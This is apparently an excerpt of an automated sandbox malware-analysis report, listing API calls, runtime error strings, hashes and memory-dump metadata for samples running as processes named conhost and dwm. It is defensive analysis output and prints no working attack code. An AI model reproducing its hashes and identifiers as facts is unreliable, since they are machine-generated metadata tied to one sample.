                                              • Instruction ID: 4b2452acdf77ae7eb9e9dba2ffdaf4a4c6bd81904afe3535cf1bfc03d5242344
                                              • Opcode Fuzzy Hash: 4e170992e9a830f5e772ae352952b17f9812ae85f3991c60a6a0385c4d56b00b
                                              • Instruction Fuzzy Hash: 4C1237B2608B8085E762CB26F8443EA77A4F789794F404215EBE957BF5EF78C189C700

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000043.00000002.2947114133.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                              • Associated: 00000043.00000002.2947042007.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                              • Associated: 00000043.00000002.2947179349.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                              • Associated: 00000043.00000002.2947255103.0000000140008000.00000004.00000001.00020000.00000000.sdmp
                                              • Associated: 00000043.00000002.2947326519.0000000140009000.00000002.00000001.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_67_2_140000000_conhost.jbxd
                                              Similarity
                                              • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                              • String ID:
                                              • API String ID: 2643109117-0
                                              • Opcode ID: c7a03f213bd366cb75c69d03db8ed93890885ebcc908e8cd25a5b94faf53fc0a
                                              • Instruction ID: 4d600fd05e0675b13939c2364bfb13a9e25d8fe7ab45c4a7bb0bf21a76da189a
                                              • Opcode Fuzzy Hash: c7a03f213bd366cb75c69d03db8ed93890885ebcc908e8cd25a5b94faf53fc0a
                                              • Instruction Fuzzy Hash: B051F6B1615A4485FA66EF27F9543EA27A2B78D7C0F448025FB8D873B1DE38C5998300

                                              Control-flow Graph

                                              APIs
                                              • VirtualQuery.KERNEL32(?,?,?,?,0000000140006C2C,0000000140006C2C,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                              • VirtualProtect.KERNEL32(?,?,?,?,0000000140006C2C,0000000140006C2C,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                              • memcpy.MSVCRT ref: 0000000140001CE0
                                              • GetLastError.KERNEL32(?,?,?,?,0000000140006C2C,0000000140006C2C,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000043.00000002.2947114133.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                              • Associated: 00000043.00000002.2947042007.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                              • Associated: 00000043.00000002.2947179349.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                              • Associated: 00000043.00000002.2947255103.0000000140008000.00000004.00000001.00020000.00000000.sdmp
                                              • Associated: 00000043.00000002.2947326519.0000000140009000.00000002.00000001.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_67_2_140000000_conhost.jbxd
                                              Similarity
                                              • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                              • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                              • API String ID: 2595394609-2123141913
                                              • Opcode ID: 5b3c3aee09c15950f6f519c6114b34436390ab1d73d09c3a1ce230fdd45d4aa1
                                              • Instruction ID: 6553d9e793cae567f2d3d1a7ece0d70305f3c176222a71b66c58140b8fcd43f4
                                              • Opcode Fuzzy Hash: 5b3c3aee09c15950f6f519c6114b34436390ab1d73d09c3a1ce230fdd45d4aa1
                                              • Instruction Fuzzy Hash: EE4122B1200A4582FA66DF57F884BE927A1F78DBC4F554126EF0A877B1DA38C58AC700

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000043.00000002.2947114133.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                              • Associated: 00000043.00000002.2947042007.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                              • Associated: 00000043.00000002.2947179349.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                              • Associated: 00000043.00000002.2947255103.0000000140008000.00000004.00000001.00020000.00000000.sdmp
                                              • Associated: 00000043.00000002.2947326519.0000000140009000.00000002.00000001.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_67_2_140000000_conhost.jbxd
                                              Similarity
                                              • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                              • String ID:
                                              • API String ID: 3326252324-0
                                              • Opcode ID: cea04487c8cb38a6d39b4516f0037f4bd1e247f2d982ee0beec2581bdbd8574b
                                              • Instruction ID: 1ad8b9b2a3bbc2eb96112f6623b64fb266d0520cc7f55f58799db44f9ed4ee4a
                                              • Opcode Fuzzy Hash: cea04487c8cb38a6d39b4516f0037f4bd1e247f2d982ee0beec2581bdbd8574b
                                              • Instruction Fuzzy Hash: 5221E3B0205A1092FA2BDB53FD443E923A5BB2CBD0F444121FF5A57AB4DF78C9868700

                                              Control-flow Graph

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000043.00000002.2947114133.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                              • Associated: 00000043.00000002.2947042007.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                              • Associated: 00000043.00000002.2947179349.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                              • Associated: 00000043.00000002.2947255103.0000000140008000.00000004.00000001.00020000.00000000.sdmp
                                              • Associated: 00000043.00000002.2947326519.0000000140009000.00000002.00000001.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_67_2_140000000_conhost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: CCG
                                              • API String ID: 0-1584390748
                                              • Opcode ID: 0f9f17f4c65d1435a5d9e9c7b13e766323237c15eac66e646cd0680b98a8732f
                                              • Instruction ID: 81af10f137695faeb8d5a898949fea76fc9d6dccae56351016f0bb00a3375992
                                              • Opcode Fuzzy Hash: 0f9f17f4c65d1435a5d9e9c7b13e766323237c15eac66e646cd0680b98a8732f
                                              • Instruction Fuzzy Hash: D72159B1A0150642FA77DA2BB5943FA1182ABCD7E4F258535BF19473F9DE3C88828241

                                              Control-flow Graph

                                              [Control-flow graph rendering omitted; basic blocks from 140001880 onward, with calls to 140002420, 140002660, 140001ba0, 140001d40 and VirtualProtect]
                                              APIs
                                              • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000043.00000002.2947114133.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                              • Associated: 00000043.00000002.2947042007.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                              • Associated: 00000043.00000002.2947179349.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                              • Associated: 00000043.00000002.2947255103.0000000140008000.00000004.00000001.00020000.00000000.sdmp
                                              • Associated: 00000043.00000002.2947326519.0000000140009000.00000002.00000001.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_67_2_140000000_conhost.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                              • API String ID: 544645111-395989641
                                              • Opcode ID: e04f8c0d7cc4af355b2a3ebedacf6063fbab78650547de3b21b1bc7de9d8dfc8
                                              • Instruction ID: ab8eb5788ef7bcd0d9c52a721197e98521d8b092ca33177dae5efd02ee1ad87a
                                              • Opcode Fuzzy Hash: e04f8c0d7cc4af355b2a3ebedacf6063fbab78650547de3b21b1bc7de9d8dfc8
                                              • Instruction Fuzzy Hash: 3E5136B2710A44D6EB22CF67F8407E92762B75DBE8F448221EB19177B4CB38C586C700

                                              Control-flow Graph

                                              [Control-flow graph rendering omitted; basic blocks from 140001800 onward, with calls to 140002290 and fprintf]
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000043.00000002.2947114133.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                              • Associated: 00000043.00000002.2947042007.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                              • Associated: 00000043.00000002.2947179349.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                              • Associated: 00000043.00000002.2947255103.0000000140008000.00000004.00000001.00020000.00000000.sdmp
                                              • Associated: 00000043.00000002.2947326519.0000000140009000.00000002.00000001.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_67_2_140000000_conhost.jbxd
                                              Similarity
                                              • API ID: fprintf
                                              • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                              • API String ID: 383729395-3474627141
                                              • Opcode ID: 56c25320ca969fe9d657b2bc87108a88152d4ef16f0091a1db2d016c02d442be
                                              • Instruction ID: 4e317e904b5edc20590a4237bc914c16bf87955fc737cdbf5c6a91052f1f93e5
                                              • Opcode Fuzzy Hash: 56c25320ca969fe9d657b2bc87108a88152d4ef16f0091a1db2d016c02d442be
                                              • Instruction Fuzzy Hash: 76F09671614A8482E612EB76F9413ED6361E75D7C1F54D211FF4E67662DF38D282C300

                                              Control-flow Graph

                                              [Control-flow graph rendering omitted; basic blocks from 14000219e onward, with calls to EnterCriticalSection, LeaveCriticalSection, TlsGetValue and GetLastError]
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000043.00000002.2947114133.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                              • Associated: 00000043.00000002.2947042007.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                              • Associated: 00000043.00000002.2947179349.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                              • Associated: 00000043.00000002.2947255103.0000000140008000.00000004.00000001.00020000.00000000.sdmp
                                              • Associated: 00000043.00000002.2947326519.0000000140009000.00000002.00000001.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_67_2_140000000_conhost.jbxd
                                              Similarity
                                              • API ID: CriticalSection$EnterErrorLastLeaveValue
                                              • String ID:
                                              • API String ID: 682475483-0
                                              • Opcode ID: 50ff8ffc264fd61f5716ee5ba4a1b6e7512efc32f7fd1fd974904cad568eb405
                                              • Instruction ID: acbcca34618c974774002cdd018836bdbae4f3c1e7b74be4baf06767ce5c221f
                                              • Opcode Fuzzy Hash: 50ff8ffc264fd61f5716ee5ba4a1b6e7512efc32f7fd1fd974904cad568eb405
                                              • Instruction Fuzzy Hash: AD01B2B5305A0192FA2BDB63FE043E86365BB2CBD1F454021EF1A53AB4DF78C9968300
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000044.00000002.2947116146.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                              • Associated: 00000044.00000002.2947044937.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                              • Associated: 00000044.00000002.2948829488.0000000140360000.00000002.00000001.00020000.00000000.sdmp
                                              • Associated: 00000044.00000002.2949307247.00000001404C8000.00000004.00000001.00020000.00000000.sdmp
                                              • Associated: 00000044.00000002.2949307247.00000001404EC000.00000004.00000001.00020000.00000000.sdmp
                                              • Associated: 00000044.00000002.2949307247.0000000140777000.00000004.00000001.00020000.00000000.sdmp
                                              • Associated: 00000044.00000002.2949307247.00000001407F8000.00000004.00000001.00020000.00000000.sdmp
                                              • Associated: 00000044.00000002.2949764149.00000001407FB000.00000002.00000001.00020000.00000000.sdmp
                                              • Associated: 00000044.00000002.2949804790.000000014081B000.00000020.00000001.00020000.00000000.sdmp
                                              • Associated: 00000044.00000002.2949843634.0000000140821000.00000002.00000001.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_68_2_140000000_dwm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                              • String ID:
                                              • API String ID: 2933794660-0
                                              • Opcode ID: 50963c1dba7b536eca43502744e0d9cb47a5b65a5662e8b8edda2bbabb9365db
                                              • Instruction ID: 79b49984e369f14b3cfd6b091ae87a2c1abf041b5e0bbbfb70a1ccaeb1af311f
                                              • Opcode Fuzzy Hash: 50963c1dba7b536eca43502744e0d9cb47a5b65a5662e8b8edda2bbabb9365db
                                              • Instruction Fuzzy Hash: 89112736710F018AEB11CF61E8553A933A4F75DB58F481E25EB6D86BA4DBB8C1998340